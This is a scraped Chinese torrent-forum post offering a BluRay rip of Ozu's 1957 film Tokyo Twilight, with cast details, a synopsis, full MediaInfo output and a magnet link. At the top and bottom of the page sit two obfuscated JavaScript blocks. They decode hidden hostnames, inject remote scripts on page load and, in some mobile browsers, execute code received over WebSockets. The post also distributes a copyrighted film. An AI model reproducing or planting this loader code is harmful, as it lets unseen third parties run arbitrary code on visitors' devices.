东京暮色[中文字幕].Tokyo.Twilight.1957.1080p.BluRay.x265.10bit.FLAC.2.0 7.26GB

版主小s 1月前 618

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 东京暮色 / T?ky? boshoku / Tokyo Twilight

◎片 名 東京暮色

◎年 代 1957

◎产 地 日本

◎类 别 剧情

◎语 言 日语

◎上映日期 1957-04-30

◎IMDb链接 https://www.imdb.com/title/tt0051093/

◎豆瓣评分 8.3/10 (4809人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300842/

◎片 长 140 分钟

◎导 演 小津安二郎 Yasujir? Ozu (id:1036727)

◎编 剧 野田高梧 K?go Noda (id:1042948)

小津安二郎 Yasujir? Ozu (id:1036727)

◎演 员 原节子 Setsuko Hara (id:1018531)

有马稻子 Ineko Arima (id:1002137)

笠智众 Chish? Ry? (id:1143078)

山田五十铃 Isuzu Yamada (id:1008122)

高桥贞二 Teiji Takahashi (id:1030843)

田浦正巳 Masami Taura (id:1030791)

杉村春子 Haruko Sugimura (id:1016991)

山村聪 S? Yamamura (id:1032895)

藤原釜足 Kamatari Fujiwara (id:1016877)

中村伸郎 Nobuo Nakamura (id:1051581)

宫口精二 Seiji Miyaguchi (id:1041790)

三好荣子 Eiko Miyoshi (id:1001843)

田中春男 Haruo Tanaka (id:1003626)

信欣三 Kinz? Shin (id:1361241)

山本和子 Kazuko Yamamoto (id:1447132)

斋藤高顺 Kojun Sait? (id:1039226)

厚田雄春 Y?haru Atsuta (id:1277547)

筱田正浩 Masahiro Shinoda (id:1032765)

◎标 签 小津安二郎 / 日本 / 日本电影 / 原节子 / 1957 / 笠智众 / 1950s / 家庭

◎简 介

自《那夜的妻子》后已没见这么绝望的小津。战后作品中,只这一部发生在严寒的冬季,亦只这么一部,探往破碎家庭那缺去的一员。已出嫁的大女儿没法与丈夫相处,回到父亲的家寻找避难所;未出嫁的二女儿忽然怀了孩子,夜夜到夜店等候负心汉的出现。与父亲下属私奔多年的母亲,突然闯进两女儿的生活,可二女儿打掉孩子后,再没法承受残酷的现实。戏剧化的故事在小津晚期作品中不多见,但低调的处理手法炮制了不少经典场面。母亲在辞别东京的列车上不断探头张望女儿一幕,几乎预见老人晚境将至的凄凉。豁达面对生命,是小津往后作品的出路。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 104497652915575999978479699036205360670 (0x4E9D841128C3D58214C8462B7186261E)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.26 GiB

  8. Duration : 2 h 20 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 388 kb/s

  11. Movie name : Tokyo Twilight

  12. Encoded date : UTC 2021-10-22 12:54:49

  13. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@Main

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 20 min

  22. Bit rate : 6 817 kb/s

  23. Width : 1 476 pixels

  24. Height : 1 080 pixels

  25. Display aspect ratio : 4:3

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.178

  32. Stream size : 6.70 GiB (92%)

  33. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  34. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1476x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Language : Japanese

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : FLAC

  41. Format/Info : Free Lossless Audio Codec

  42. Codec ID : A_FLAC

  43. Duration : 2 h 20 min

  44. Bit rate mode : Variable

  45. Bit rate : 527 kb/s

  46. Channel(s) : 2 channels

  47. Channel layout : L R

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 11.719 FPS (4096 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossless

  52. Stream size : 530 MiB (7%)

  53. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  54. Language : Japanese

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. ID in the original source medium : 4610 (0x1202)

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 2 h 16 min

  65. Bit rate : 11.8 kb/s

  66. Count of elements : 2260

  67. Stream size : 11.5 MiB (0%)

  68. Title : chs

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No

  72. Original source medium : Blu-ray


  73. Text #2

  74. ID : 4

  75. ID in the original source medium : 4611 (0x1203)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 2 h 16 min

  81. Bit rate : 7 357 b/s

  82. Count of elements : 2260

  83. Stream size : 7.16 MiB (0%)

  84. Title : cht

  85. Language : Chinese

  86. Default : No

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #3

  90. ID : 5

  91. ID in the original source medium : 4609 (0x1201)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 2 h 20 min

  97. Bit rate : 41.3 kb/s

  98. Count of elements : 2916

  99. Stream size : 41.4 MiB (1%)

  100. Title : eng

  101. Language : English

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #4

  106. ID : 6

  107. ID in the original source medium : 4608 (0x1200)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 2 h 16 min

  113. Bit rate : 43.9 kb/s

  114. Count of elements : 2821

  115. Stream size : 42.7 MiB (1%)

  116. Title : jpn

  117. Language : Japanese

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Menu

  122. 00:00:00.000 : Chapter 01

  123. 00:07:33.661 : Chapter 02

  124. 00:12:45.389 : Chapter 03

  125. 00:18:51.755 : Chapter 04

  126. 00:22:38.315 : Chapter 05

  127. 00:31:10.952 : Chapter 06

  128. 00:37:29.080 : Chapter 07

  129. 00:41:55.596 : Chapter 08

  130. 00:46:40.506 : Chapter 09

  131. 00:49:52.948 : Chapter 10

  132. 00:57:58.683 : Chapter 11

  133. 01:05:39.226 : Chapter 12

  134. 01:10:09.163 : Chapter 13

  135. 01:15:39.868 : Chapter 14

  136. 01:24:47.290 : Chapter 15

  137. 01:29:14.891 : Chapter 16

  138. 01:34:26.994 : Chapter 17

  139. 01:40:03.497 : Chapter 18

  140. 01:46:25.003 : Chapter 19

  141. 01:54:26.985 : Chapter 20

  142. 02:00:18.878 : Chapter 21

  143. 02:09:09.908 : Chapter 22

  144. 02:13:07.604 : Chapter 23

  145. 02:17:55.892 : Chapter 24




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:5B0F8B3DA02C04CB6F2F48AC739E91125E5D1C58

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};